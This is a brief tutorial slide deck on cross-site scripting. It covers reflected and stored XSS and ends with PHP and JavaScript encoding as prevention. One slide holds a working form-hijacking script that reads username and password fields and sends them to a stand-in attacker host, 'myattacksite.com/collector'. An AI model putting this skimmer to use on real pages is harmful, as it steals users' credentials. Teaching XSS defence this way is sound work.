XSS

What is XSS

  • Cross Site Scripting
  • Familiar way to hack
  • Cause by bad habit

Types of XSS

Reflected XSS

Reflected XSS

document.forms[0].onsubmit = function() {
    var username = document.forms[0]["username"].value;
    var password = document.forms[0]["password"].value;
    var password1 = document.forms[0]["password1"].value;
    var password2 = document.forms[0]["password2"].value;
    var req = new XMLHttpRequest();
    req.open("GET", 'http://myattacksite.com/collector?u='+ username + 
    '&p=' + password + '&p1=' + password1 + '&p2=' + password2, false);
    req.send();
};

HTML Encode:

http://infor.org/no_such_thing.js

\( \to \)

http%3A%2F%2Finfor.org%2Fno_such_thing.js

Stored XSS

Just comment some javascript, and you found you can do every things

Example: https://ototot.tk/XSS-Test

You could use htmlencode to prevent your website suffer from it

Example

Prevent

<?php
    htmlspecialchars($_GET['something']);
?>
<script>
    encodeURI(fromServer);
</script>

XSS

By Tommy Chiang

Made with Slides.com

XSS

  • 373

More from Tommy Chiang